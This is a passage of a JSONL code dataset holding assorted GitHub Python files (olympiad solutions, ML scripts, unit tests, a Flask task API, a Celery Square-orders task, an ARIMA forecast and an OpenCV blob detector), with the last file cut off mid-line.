min_n_events=min_n_events\n )\n eval_EventsVisualization(output_path, valid_dataset)\n","repo_name":"SkyLionx/evit","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":12595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"17974678196","text":"from PIL import Image, ImageDraw\n\n# Llegim l'entrada\nn = int(input())\n\n# Creem la imatge, amb la mida i el color de fons corresponents\nimg = Image.new('RGB', (3*n, 3*n), 'Beige')\ndib = ImageDraw.Draw(img)\n\n# Dibuixem el polígon, donant els vèrtexs en ordre\n# Vigileu amb no pintar píxels de més!\ndib.polygon([\n (n, 0),\n (2*n - 1, 0),\n (3*n - 1, n),\n (3*n - 1, 2*n - 1),\n (2*n - 1, 3*n - 1),\n (n, 3*n - 1),\n (0, 2*n - 1),\n (0, n)\n], 'Red')\n\n# Guardem la imatge\nimg.save('output.png')\n","repo_name":"oicatalana/solucions_oicat_2022","sub_path":"concurs_benvinguda/P06_G1.py","file_name":"P06_G1.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"27241149852","text":"import subprocess\nimport urllib.parse\n\n\ndef parse_file(file_path):\n\n file_data = open(file_path).read().split('\\n')\n colums = []\n for line in file_data:\n if \"@Column\" in line:\n colums.append(line.split(\"\\\"\")[1])\n\n return colums\n\n\ndef parse_sql(file_path):\n file_data = open(file_path).read().replace('\\n', '')\n\n tables = {}\n\n tables_parse = file_data.split(\"CREATE TABLE\")\n for parse in tables_parse:\n stack_bracket = []\n temp_name = ''\n parse = parse\n index = 0\n while index0:\n if parse[index]==')':\n stack_bracket.pop()\n elif parse[index]=='(':\n stack_bracket.append(1)\n table_colums+=parse[index]\n index+=1\n\n colums_parse = table_colums.split(',')\n colums = []\n for i in colums_parse:\n\n for j in i.split(' '):\n if j!='':\n if j!=\"KEY\" and j!= \"PRIMARY\":\n colums.append(j)\n break\n\n\n\n #print(colums)\n tables[temp_name] = sorted(colums)\n return tables\n\n\n\n\n\n\n\n\npath = 'firewall-db/src/main/java/com/integralads/firewalldb/domain/entity/'\n\nsql_tables = parse_sql(\"db.sql\")\nprint(sql_tables)\nfor table in sql_tables:\n java_name = ''\n for i in table.split('_'):\n java_name+=i[0].upper()\n for j in i[1:]:\n java_name+=j.lower()\n print(java_name+\"->\")\n temp_schema = sorted(parse_file(path+java_name+'.java'))\n print(temp_schema)\n print(sql_tables[table])\n if temp_schema == sorted(sql_tables[table]):\n print(\"schema match\")\n else:\n print(\"schema dont match\")\n\n\n\n\n\n\n\n\n","repo_name":"tnimale-ias/My-test-code","sub_path":"firewall_db_update_poc.py","file_name":"firewall_db_update_poc.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"26732441260","text":"# test_mercer_gaussian_process.py\nimport unittest\nimport torch\nfrom ortho.basis_functions import (\n smooth_exponential_basis,\n smooth_exponential_eigenvalues,\n Basis,\n)\n\nfrom mercergp.kernels import MercerKernel\nfrom mercergp.MGP import MercerGP\n\n\nclass TestMercerGP(unittest.TestCase):\n def setUp(self):\n # basis parameters\n self.basis_function = smooth_exponential_basis\n self.dimension = 1\n self.order = 10\n\n # parameters\n l_se = torch.Tensor([[5]])\n sigma_se = torch.Tensor([1])\n prec = torch.Tensor([1])\n sigma_e = torch.Tensor([0.01])\n se_kernel_args = {\n \"ard_parameter\": l_se,\n \"variance_parameter\": sigma_se,\n \"noise_parameter\": sigma_e,\n \"precision_parameter\": prec,\n }\n\n self.params = se_kernel_args\n\n # basis function\n self.basis = Basis(\n self.basis_function, self.dimension, self.order, self.params\n )\n\n self.eigenvalues = smooth_exponential_eigenvalues(\n self.order, self.params\n )\n\n # gp perameters\n self.kernel = MercerKernel(\n self.order, self.basis, self.eigenvalues, self.params\n )\n\n self.mercer_gp = MercerGP(\n self.basis, self.order, self.dimension, self.kernel\n )\n return\n\n def test_adding_data(self):\n x = torch.Tensor([0.1, 4, 5.24, 7])\n x2 = torch.Tensor([2, 3, 4, 5])\n y = torch.Tensor([3, 4, 5, 6])\n y2 = torch.Tensor([9, 2, 7, 8])\n\n self.mercer_gp.add_data(x, y)\n self.mercer_gp.add_data(x2, y2)\n xs, ys = self.mercer_gp.get_inputs(), self.mercer_gp.get_outputs()\n\n self.assertTrue(\n (xs == torch.Tensor([0.1, 4, 5.24, 7, 2, 3, 4, 5])).all()\n )\n self.assertTrue((ys == torch.Tensor([3, 4, 5, 6, 9, 2, 7, 8])).all())\n\n def test_coefficients_shape_flat(self):\n # mercer_gp = MercerGP(\n # self.basis, self.eigenvalues, self.order, self.kernel\n # )\n test_inputs = torch.linspace(0, 1, 20)\n test_outputs = torch.linspace(0, 1, 20)\n\n self.mercer_gp.add_data(test_inputs, test_outputs)\n\n coefficients = self.mercer_gp._calculate_posterior_coefficients()\n self.assertEqual(coefficients.shape, torch.Size([self.order]))\n return\n\n def test_coefficients_shape_1d(self):\n test_inputs = torch.linspace(0, 1, 20).unsqueeze(1)\n test_outputs = torch.linspace(0, 1, 20).unsqueeze(1)\n\n self.mercer_gp.add_data(test_inputs, test_outputs)\n\n coefficients = self.mercer_gp._calculate_posterior_coefficients()\n self.assertEqual(coefficients.shape, torch.Size([self.order]))\n return\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"daveb-dev/mercergp","sub_path":"test/test_mercer_gaussian_processes.py","file_name":"test_mercer_gaussian_processes.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"7575084533","text":"# input\nk = int(input())\n\n# stack : pop if input is 0\nstack = []\nfor i in range(k):\n n = int(input())\n if n == 0 and stack:\n stack.pop()\n elif n != 0:\n stack.append(n)\n\n# print ans\nprint(sum(stack))\n","repo_name":"sangwonme/BOJ-sols","sub_path":"Q_10773.py","file_name":"Q_10773.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"12647536831","text":"import pandas as pd\nfrom datetime import datetime, timezone, timedelta\nfrom celery import shared_task\nfrom django.contrib.auth.models import User\n\nfrom core.analytics_utils import get_analytics, get_item_props\nfrom core.square_api_utils import get_locations, get_orders, parse_orders\n\nglobal NUMERIC_COLS\nNUMERIC_COLS = ['quantity', 'item_price', 'total_item_price', 'total_order_price']\n\n@shared_task\ndef sample_task():\n print(\"My task has run\")\n return None\n\n@shared_task\ndef update_user_info(\n user_pks: list = None,\n pull_data: bool = True,\n update_analytics: bool = True,\n years_to_update: list = None\n):\n '''\n 1. Data Extraction\n - Pull new transactions data from Square API\n - Update raw_data and parsed_data\n 2. Run Analytics\n - Update user's analytics based on parsed_data\n '''\n if user_pks == None:\n users = User.objects.all()\n else:\n users = User.objects.filter(pk__in=user_pks)\n\n for user in users:\n orders_df = user.data.read_parsed_data()\n orders_df['timestamp'] = pd.to_datetime(orders_df.timestamp, utc=True)\n items_df = user.data.read_parsed_data(field=\"menu_data\")\n raw_orders = user.data.read_raw_data()\n\n YEARS_TO_UPDATE = orders_df.timestamp.dt.year.unique()\n\n if user.data.source == 'Square' and pull_data == True:\n ## Run function to extract Square data\n print('extracting square data...')\n\n ACCESS_TOKEN = user.data.access_key\n locations = get_locations(ACCESS_TOKEN)\n loc_ids = [locs['id'] for locs in locations['locations']]\n start_time = (datetime.now(timezone.utc).astimezone() - timedelta(1.5)).isoformat()\n end_time = datetime.now(timezone.utc).astimezone().isoformat()\n orders = get_orders(start_time, end_time, loc_ids, ACCESS_TOKEN)\n new_orders_df = parse_orders(orders)\n\n ## Create new raw_orders list and remove duplicates\n ## Note that set() does not work because the list contains dicts, which are unhashable\n raw_orders = raw_orders + orders['orders']\n raw_orders = [i for n, i in enumerate(raw_orders) if i not in raw_orders[n + 1:]]\n user.data.save_raw_data(raw_orders)\n\n ## Create new orders_df and drop duplicates\n orders_df = pd.concat([orders_df, new_orders_df])\n orders_df[NUMERIC_COLS] = orders_df[NUMERIC_COLS].apply(pd.to_numeric)\n # Timestamp inconsistencies causes problems, and is thus excluded.\n orders_df.drop_duplicates(subset=['order_id', 'item_name']+NUMERIC_COLS, inplace=True)\n orders_df.to_csv('maxi_error.csv',index=False)\n user.data.save_parsed_data(orders_df)\n print(len(orders_df))\n\n YEARS_TO_UPDATE = new_orders_df.timestamp.dt.year.unique()\n print('square data extracted')\n\n if update_analytics == True:\n orders_df['timestamp'] = pd.to_datetime(orders_df.timestamp, utc=True)\n\n if years_to_update != None:\n YEARS_TO_UPDATE = years_to_update\n for year in YEARS_TO_UPDATE:\n print('updating for {}'.format(year))\n period_df = orders_df[orders_df.timestamp.dt.year == year].copy()\n analytics = user.analytics.get(start_date=datetime(year,1,1))\n\n new_analytics_data = get_analytics(period_df)\n new_analytics_data['items'] = get_item_props(period_df, items_df)\n\n analytics.data = new_analytics_data\n analytics.save()\n\n return None\n","repo_name":"michaelchen-lab/menucarlo-backend","sub_path":"core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"72540624498","text":"# --------------------------\n# UFSC - CTC - INE - INE5603\n# Exercício Processa Números\n# --------------------------\n# Classe responsável por obter os números pares.\n\nfrom view.paineis.painel_abstrato import PainelAbstrato\nfrom model.processa_numeros import pares as encontra_pares\n\nclass PainelPares(PainelAbstrato):\n def __init__(self):\n super().__init__('Pares')\n\n def interaja(self):\n numeros = self._leiaints()\n pares = encontra_pares(numeros)\n msg = 'A lista {} contém os seguintes números pares: {}'.format(numeros, pares)\n print(msg)\n","repo_name":"ine5603-tarefas/ine5603-tarefas-20202","sub_path":"lista-02/processa-numeros/view/paineis/painel_pares.py","file_name":"painel_pares.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"21439191135","text":"from common.globals import DEBUG, LOGS_PATH\nfrom sys import stdout\nimport logging.handlers\nimport logging\n\nif DEBUG:\n LOG_PATH = LOGS_PATH / 'development'\n LOG_LEVEL = logging.INFO\nelse:\n LOG_PATH = LOGS_PATH / 'production'\n LOG_LEVEL = logging.WARNING\n\nclass CLogger(logging.Logger):\n\n def __init__(self, PATH = LOG_PATH, LOGLEVEL = LOG_LEVEL, name='CBOT'):\n super().__init__(name)\n self.setLevel(LOGLEVEL)\n \n FileHandler = logging.handlers.RotatingFileHandler(\n filename= PATH / 'discord.log',\n encoding='utf-8',\n maxBytes=32 * 1024 * 1024, # 32 MiB\n backupCount=5, # Rotate through 5 files\n )\n ConsoleHandler=logging.StreamHandler(stdout)\n ConsoleHandler.setFormatter(_ColourFormatter())\n self.addHandler(ConsoleHandler)\n self.addHandler(FileHandler)\n\nclass _ColourFormatter(logging.Formatter):\n\n LEVEL_COLOURS = [\n (logging.DEBUG, '\\x1b[40;1m'),\n (logging.INFO, '\\x1b[34;1m'),\n (logging.WARNING, '\\x1b[33;1m'),\n (logging.ERROR, '\\x1b[31m'),\n (logging.CRITICAL, '\\x1b[41m'),\n ]\n\n FORMATS = {\n level: logging.Formatter(\n f'\\x1b[30;1m%(asctime)s\\x1b[0m {colour}%(levelname)-8s\\x1b[0m \\x1b[35m%(name)s\\x1b[0m %(message)s',\n '%Y-%m-%d %H:%M:%S',\n )\n for level, colour in LEVEL_COLOURS\n }\n\n def format(self, record):\n formatter = self.FORMATS.get(record.levelno)\n if formatter is None:\n formatter = self.FORMATS[logging.DEBUG]\n\n # Override the traceback to always print in red\n if record.exc_info:\n text = formatter.formatException(record.exc_info)\n record.exc_text = f'\\x1b[31m{text}\\x1b[0m'\n\n output = formatter.format(record)\n\n # Remove the cache layer\n record.exc_text = None\n return output","repo_name":"CanavarB/CBOT","sub_path":"CLogger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"2222395969","text":"import cv2\nimport tensorflow as tf\nimport keras\nimport numpy as np\nfrom keras.models import load_model\nimport scipy.misc\n\n#print(tf.__version__)\n#print(keras.__version__)\n\n#provide model path here\nmodel_path = r'C:\\Projects\\Steering Angle Prediction\\model\\model_final_DV2.h5'\nmodel = load_model(model_path)\n\n#use to pre-process the each frame\ndef img_preprocess(image):\n height, _, _ = image.shape #this returns height,width,channel\n image = image[int(height/2):,:,:] # remove top half of the image, as it is not relavant for lane following\n image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV) \n image = cv2.GaussianBlur(image, (3,3), 0)\n image = cv2.resize(image, (200,66)) # input image size (200,66) Nvidia model\n image = image / 255 # normalizing, the processed image becomes black for some reason. do we need this?\n return image\n\n#predicts the steering angle for each frame based on the trained model\ndef compute_steering_angle(frame):\n preprocessed = img_preprocess(frame)\n X = np.asarray([preprocessed])\n steering_angle = model.predict(X)[0]\n #print(X(0))\n return steering_angle\n\n#load the steeing angle image\nimg = cv2.imread(r'C:\\Projects\\Steering Angle Prediction\\assets\\steering.png',0)\nrows,cols = img.shape\n#xcv2.imshow('img1',img)\n#cv2.waitKey()\n\nsmoothed_angle = 0\ni=0\nwhile(cv2.waitKey(10) != ord('q')):\n #load the data set images one by one \n full_image = cv2.imread(r'C:\\Users\\alok\\Desktop\\dataset2\\driving_dataset\\\\' + str(i) + \".jpg\")\n pred_angle = compute_steering_angle(full_image) * (180 / scipy.pi)\n print(\"Predicted steering angle: \" + str(pred_angle) + \" degrees\")\n cv2.imshow(\"frame\", cv2.cvtColor(full_image, cv2.COLOR_RGB2BGR))\n\n smoothed_angle += 0.2 * pow(abs((pred_angle - smoothed_angle)), 2.0 / 3.0) * (pred_angle - smoothed_angle) / abs(pred_angle - smoothed_angle)\n smoothed_angle = int(smoothed_angle);\n M = cv2.getRotationMatrix2D((cols/2,rows/2),-smoothed_angle,1)\n dst = cv2.warpAffine(img,M,(cols,rows))\n cv2.imshow(\"steering wheel\", dst)\n\n i +=1\n\ncv2.destroyAllWindows()\n","repo_name":"alok073/Steering-angle-prediction","sub_path":"src/simulation/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"27850728062","text":"import pytest\n\nfrom problem import build_validator, calculate_ticket_error_rate, find_field_ordering, invalid_ticket_score,\\\n parse_tickets, validate_ticket\n\nEXAMPLE_TICKETS = \"\"\"\\\nclass: 1-3 or 5-7\nrow: 6-11 or 33-44\nseat: 13-40 or 45-50\n\nyour ticket:\n7,1,14\n\nnearby tickets:\n7,3,47\n40,4,50\n55,2,20\n38,6,12\\\n\"\"\"\n\n\ndef test_day16_ticket_error_rate():\n rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n assert calculate_ticket_error_rate(rules, nearby_tickets) == 71\n\n\ndef test_day16_build_validator():\n rule = '1-3 or 5-7'\n validator = build_validator(rule)\n assert validator(1)\n assert validator(3)\n assert not validator(4)\n assert validator(5)\n assert validator(6)\n assert not validator(8)\n\n\n@pytest.mark.parametrize('ticket,expected_value', [\n ([7, 3, 47], None),\n ([40, 4, 50], 4),\n ([55, 2, 20], 55),\n ([38, 6, 12], 12),\n])\ndef test_day16_invalid_ticket_value(ticket, expected_value):\n rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n assert invalid_ticket_score(rules, ticket) == expected_value\n\n\ndef test_day16_validate_ticket():\n rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n assert validate_ticket(rules, ['row', 'class', 'seat'], nearby_tickets[0])\n\n\ndef test_day16_find_field_ordering():\n rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n assert find_field_ordering(rules, nearby_tickets) == ['row', 'class', 'seat']\n","repo_name":"stephenhelms/adventofcode2020","sub_path":"day16/test_day16.py","file_name":"test_day16.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24061561775","text":"# coding=utf-8\nimport random\n\nsecrect = random.randint(1,10)\nprint('secrect = %d' %secrect)\nprint('----------------小甲鱼C工作室----------------')\ntemp = input('不妨猜一下小甲鱼现在心里想的是哪个数字:')\nif temp.isdigit():\n guess = int(temp)\n times = 1\n if guess == secrect:\n print('我去,你是小甲鱼心里的蛔虫吗?!')\n print('哼,猜中了也没有奖励!')\n else:\n while guess != secrect and times !=3:\n times += 1\n temp = input('哎呀,猜错了,请重新输入吧:')\n if temp.isdigit():\n guess = int(temp)\n if guess == secrect:\n print('我去,你是小甲鱼心里的蛔虫吗?!')\n print('哼,猜中了也没有奖励!')\n elif guess > secrect:\n print('哥,大了大了~~')\n else:\n print('嘿,小了!小了!')\n else:\n print('输入类型不对!!!')\n print('游戏结束,不玩啦^_^')\nelse:\n print('输入类型不对,请输入数字!!!')\n","repo_name":"babyfeir/python-excise","sub_path":"xiaojiayu/python-004.py","file_name":"python-004.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"31065103269","text":"#!/usr/bin/python3\ndef search_replace(my_list, search, replace):\n \n # Create a new list with the same size as the initial list\n \n new_list = [None] * len(my_list)\n \n # Iterate over the initial list\n \n for i in range(len(my_list)):\n \n # Check if the current element is the one to replace\n \n if my_list[i] == search:\n \n # If it is, replace it with the new element\n \n new_list[i] = replace\n \n else:\n \n # If it is not, keep the original element\n \n new_list[i] = my_list[i]\n \n # Return the new list\n \n return new_list\n\n","repo_name":"NyarCal/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18559626902","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom statsmodels.graphics.tsaplots import plot_acf\r\nfrom statsmodels.graphics.tsaplots import plot_pacf\r\nfrom statsmodels.tsa.stattools import adfuller as ADF\r\nfilename='G:/python_work/arima_data.xls'\r\nforrecastnum=5\r\ndata=pd.read_excel(filename,index_col=u'日期')\r\nplt.rcParams['font.sans-serif'] = ['SimHei']\r\nplt.rcParams['axes.unicode_minus'] = False\r\ndata.plot()\r\nplt.title('Time Series')\r\nplt.show()\r\nplot_acf(data)\r\nplt.show()\r\nprint(u'原始序列的ADF检验结果为:',ADF(data[u'销量']))\r\nD_data=data.diff(periods=1).dropna()\r\nD_data.columns=[u'销量差分']\r\nD_data.plot()\r\nplt.show()\r\nplot_acf(D_data).show()\r\nplot_pacf(D_data).show()\r\nprint(u'1阶差分序列的ADF检验结果为:',ADF(D_data[u'销量差分']))\r\nfrom statsmodels.stats.diagnostic import acorr_ljungbox\r\nprint(u'差分序列的白噪声检验结果为:',acorr_ljungbox(D_data,lags=1))\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\ndata[u'销量'] = data[u'销量'].astype(float)\r\npmax=int(len(D_data)/10)\r\nqmax=int(len(D_data)/10)\r\nbic_matrix=[]\r\nfor p in range(pmax+1):\r\n tmp=[]\r\n for q in range(qmax+1):\r\n try:\r\n tmp.append(ARIMA(data,(p,1,q)).fit().bic)\r\n except:\r\n tmp.append(None)\r\n bic_matrix.append(tmp)\r\nbic_matrix=pd.DataFrame(bic_matrix)\r\nprint(bic_matrix)\r\np,q=bic_matrix.stack().idxmin()\r\nprint(u'bic最小的P值和q值为:%s、%s'%(p,q))\r\nmodel=ARIMA(data,(p,1,q)).fit()\r\nmodel.summary2()\r\nforecast=model.forecast(5)\r\nprint(forecast)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"huang027/ARIMA","sub_path":"ARIMA.py","file_name":"ARIMA.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"57"} +{"seq_id":"42036755098","text":"import random\r\nimport numpy\r\nimport time\r\n\r\ndef sim(trial):\r\n true = 0\r\n for i in range(trial):\r\n x = random.uniform(0, 1)\r\n y = random.uniform(0, 1)\r\n if x**2 + y**2 < 1:\r\n true += 1\r\n\r\n print(4*true / trial)\r\n\r\nstart = time.time()\r\ntrial = 1000000\r\nsim(trial)\r\nelapsed_time = time.time() - start\r\nprint(\"elapsed_time:{0}\".format(elapsed_time) + \"[sec]\")","repo_name":"Tomoro0726/Monte","sub_path":"monte3.py","file_name":"monte3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70901440817","text":"#! /usr/bin/env python3\n\nimport sys\nimport os\nimport argparse\nimport json\nimport re\n\ndef main():\n arg_parser = argparse.ArgumentParser(description = 'Simplify and fix scenarios in a JSON collection format')\n arg_parser.add_argument(\"json_in_file\", type=str,\n help=\"input .json file to be converted\")\n arg_parser.add_argument(\"json_out_file\", type=str,\n help=\"output .json file to save the scenarios to\")\n arg_parser.add_argument(\"-p\", \"--remove-local-path\", action=\"store_true\",\n help=\"Removes the local-path directive (it needs to be re-added in order to execute the scenarios) (default: disabled)\")\n\n args = arg_parser.parse_args()\n with open(args.json_in_file, \"r\") as in_fs:\n scenario_list = json.load(in_fs)\n\n rv = []\n for i, scenario in enumerate(scenario_list):\n scenario_str = scenario['body']\n if args.remove_local_path:\n scenario_str = re.sub(r'^[\\s\\S]*localPath[^\\n]*\\n', \"\", scenario_str, flags=re.MULTILINE)\n scenario_str = re.sub(r'^\\s*#[^\\n]*$', \"\", scenario_str, flags=re.MULTILINE) # Remove whole-line comments\n scenario_str = re.sub(r'^\\s*\\n', \"\", scenario_str, flags=re.MULTILINE) # Remove empty lines\n scenario_str = re.sub(r'^(\\s*)model scenic.[\\S]*', r'\\1model scenic.simulators.carla.model', scenario_str, flags=re.MULTILINE) # Fix incorrect model name\n scenario_str = re.sub(r'vehicle.lincoln.mkz2017', 'vehicle.lincoln.mkz_2017', scenario_str) # Fix broken vehicle name\n scenario['body'] = scenario_str\n rv.append(scenario)\n\n with open(args.json_out_file, \"w\") as out_fs:\n json.dump(rv, out_fs, indent=2)\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"Avmb/DialogLLMScenic","sub_path":"scenario_generation/simplify_scenarios_in_json_collection.py","file_name":"simplify_scenarios_in_json_collection.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"22009519486","text":"import logging\nimport os\n\nfrom flask import Blueprint, jsonify, request\n\nfrom .controllers import Task, TaskCollection, manager\nfrom .tasks import example_task, face_identify\n\ntasks = Blueprint(\"tasks\", __name__)\n\nlogger = logging.getLogger(__name__)\n\n\n@tasks.route(\"/start\", methods=[\"POST\", \"GET\"])\ndef start():\n if request.method == \"POST\":\n n = int(request.form[\"n\"])\n t = float(request.form[\"t\"])\n priority = int(request.form[\"priority\"])\n\n collection = TaskCollection()\n for _ in range(n):\n Task(collection, example_task, t, priority=priority)\n manager.add_task_collection(collection)\n\n return jsonify({\"Status\": \"Success\", \"task_collection_id\": collection.id})\n\n else:\n return \"\"\"\n \n \n \n \n \"\"\"\n\n\n@tasks.route(\"/face-rec\", methods=[\"POST\", \"GET\"])\ndef face_rec():\n if request.method == \"POST\":\n dirpath = request.form[\"dir\"]\n priority = int(request.form[\"priority\"])\n filepaths = [\n os.path.join(dirpath, filename) for filename in os.listdir(dirpath)\n ]\n\n collection = TaskCollection()\n\n for filepath in filepaths:\n Task(collection, face_identify, filepath, tolerace=0.5, priority=priority)\n\n manager.add_task_collection(collection)\n return jsonify({\"task_collection_id\": collection.id})\n\n else:\n return \"\"\"
\n \n \n \n
\"\"\"\n\n\n@tasks.route(\"/status\")\ndef status():\n task_collection_id = request.args.get(\"id\")\n\n if task_collection_id is None:\n results = manager.status()\n return jsonify(results)\n else:\n status, progress = manager.status(task_collection_id)\n return jsonify(\n {\n \"task_collection_id\": task_collection_id,\n \"status\": status,\n \"progress\": progress,\n }\n )\n","repo_name":"griseduardo/Facial-Recognition-Database-Management-System","sub_path":"server/tasks/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"27835836351","text":"# tweet.py\n# Class for storing tweets.\n\nimport re\n\nRTPAT = re.compile('^RT @(\\w+):')\n\nclass Tweet(object):\n\tdef __init__(self, text=None, tweet_id=None, author=None, author_id=None, timestamp=None):\n\t\tself.text = text\n\t\tself.tweet_id = tweet_id\n\t\tself.author = author\n\t\tself.author_id = author_id\n\t\tself.timestamp = timestamp\n\n\t\tself.tokens = []\n\t\tself.poses = []\n\t\tself.phrases = []\n\t\tself.awards = []\n\n\tdef is_retweet(self):\n\t\treturn bool(RTPAT.match(self.text))\n\n\tdef retweet_user(self):\n\t\tm = RTPAT.match(self.text)\n\t\treturn m.group(1) if m else None\n","repo_name":"brandonfujii/golden_globes","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"33309219630","text":"\"\"\"\nLayers\n======\n\nLayers are the standard unit of neural models in DyNN. Layers are typically\nused like this:\n\n.. code-block:: python\n\n # Instantiate layer\n layer = Layer(parameter_collection, *args, **kwargs)\n # [...]\n # Renew computation graph\n dy.renew_cg()\n # Initialize layer\n layer.init(*args, **kwargs)\n # Apply layer forward pass\n y = layer(x)\n\"\"\"\nfrom .base_layers import BaseLayer, ParametrizedLayer\n\nfrom .functional_layers import Lambda\nfrom .dense_layers import Affine\nfrom .embedding_layers import Embeddings\nfrom .residual_layers import Residual\nfrom .recurrent_layers import (\n RecurrentCell, StackedRecurrentCells, ElmanRNN, LSTM, StackedLSTM\n)\nfrom .transduction_layers import Transduction, Unidirectional, Bidirectional\nfrom .pooling_layers import MaxPool1D, MaxPool2D, MeanPool1D\nfrom .attention_layers import (\n MLPAttention, BilinearAttention, MultiHeadAttention\n)\nfrom .convolution_layers import Conv1D, Conv2D\nfrom .flow_layers import Flatten\nfrom .normalization_layers import LayerNorm\nfrom .combination_layers import Sequential, Parallel\nfrom .transformer_layers import (\n Transformer, StackedTransformers, CondTransformer, StackedCondTransformers\n)\n\n\n__all__ = [\n \"BaseLayer\",\n \"ParametrizedLayer\",\n \"Lambda\",\n \"Affine\",\n \"Embeddings\",\n \"Residual\",\n \"RecurrentCell\",\n \"StackedRecurrentCells\",\n \"ElmanRNN\",\n \"LSTM\",\n \"StackedLSTM\",\n \"Transduction\",\n \"Unidirectional\",\n \"Bidirectional\",\n \"MaxPool1D\",\n \"MaxPool2D\",\n \"MeanPool1D\",\n \"MLPAttention\",\n \"BilinearAttention\",\n \"MultiHeadAttention\",\n \"Conv1D\",\n \"Conv2D\",\n \"Flatten\",\n \"LayerNorm\",\n \"Sequential\",\n \"Parallel\",\n \"Transformer\",\n \"StackedTransformers\",\n \"CondTransformer\",\n \"StackedCondTransformers\"\n]\n","repo_name":"pmichel31415/dynn","sub_path":"dynn/layers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41444834052","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 13 18:30:04 2021\r\n\r\n@author: 14677\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom geometry_msgs.msg import Point\r\n\r\n# Params for camera calibration\r\ntheta = 0\r\nbeta = 1\r\ntx = 0\r\nty = 0\r\n\r\ndef IMG2W(x,y):\r\n #T = np.array([1,0,0,tx],[0,1,0,ty],[0,0,1,0],[0,0,0,1])\r\n yw=((x-394)/beta)*1000+ty\r\n xw=((y-256)/beta)*1000+tx\r\n return [xw,yw]\r\n\r\ndef blob_search(image_raw, color):\r\n # Setup SimpleBlobDetector parameters.\r\n params = cv2.SimpleBlobDetector_Params()\r\n # Filter by Color\r\n params.filterByColor = False\r\n # Filter by Area.\r\n params.filterByArea = True\r\n params.maxArea = 800\r\n params.minArea = 250\r\n # Filter by Circularity\r\n params.filterByCircularity = False\r\n params.maxCircularity = 0.82\r\n params.minCircularity = 0.7\r\n # Filter by Inerita\r\n params.filterByInertia = False\r\n params.maxInertiaRatio = 1\r\n params.minInertiaRatio = 0.8\r\n # Filter by Convexity\r\n params.filterByConvexity = False\r\n # Create a detector with the parameters\r\n detector = cv2.SimpleBlobDetector_create(params)\r\n # Convert the image into the HSV color space\r\n hsv_image = cv2.cvtColor(image_raw, cv2.COLOR_BGR2HSV)\r\n if (color=='yellow'):\r\n lower = (20,150,50) # yellow lower\r\n upper = (36,255,255) # yellow upper\r\n elif (color=='brown') :\r\n lower = (35,150,50) # brown lower\r\n upper = (74,255,255) # brown upper\r\n else :\r\n lower = (35,150,50) # green lower\r\n upper = (74,255,255) # green upper\r\n \r\n # Define a mask using the lower and upper bounds of the target color\r\n mask_image = cv2.inRange(hsv_image, lower, upper)\r\n keypoints = detector.detect(mask_image)\r\n # Find blob centers in the image coordinates\r\n blob_image_center = []\r\n #num_blobs = len(keypoints)\r\n num_blobs = len(keypoints)\r\n for i in range(num_blobs):\r\n blob_image_center.append((keypoints[i].pt[0],keypoints[i].pt[1]))\r\n # Draw the keypoints on the detected 